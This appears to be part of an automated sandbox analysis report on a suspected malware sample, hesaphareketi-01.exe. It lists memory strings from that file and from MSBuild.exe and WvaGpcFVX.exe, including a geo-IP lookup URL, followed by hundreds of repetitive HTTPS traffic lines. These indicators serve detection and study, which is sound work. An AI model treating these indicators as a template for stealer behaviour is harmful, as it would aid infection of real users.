Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80
Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80$

Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 56849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50218
Source: unknown	Network traffic detected: HTTP traffic on port 50254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50217
Source: unknown	Network traffic detected: HTTP traffic on port 56906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 56884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 56861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 56929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 56930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56900
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 56883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 56827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown	Network traffic detected: HTTP traffic on port 56838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown	Network traffic detected: HTTP traffic on port 56798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 56848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56832
Source: unknown	Network traffic detected: HTTP traffic on port 56887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 56921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56848
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56849
Source: unknown	Network traffic detected: HTTP traffic on port 56898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56846
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 56829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 56853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56859
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 56805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56861
Source: unknown	Network traffic detected: HTTP traffic on port 56818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56865
Source: unknown	Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56871
Source: unknown	Network traffic detected: HTTP traffic on port 56886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 56830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56916
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 56807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 56839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 56816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56929
Source: unknown	Network traffic detected: HTTP traffic on port 56934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
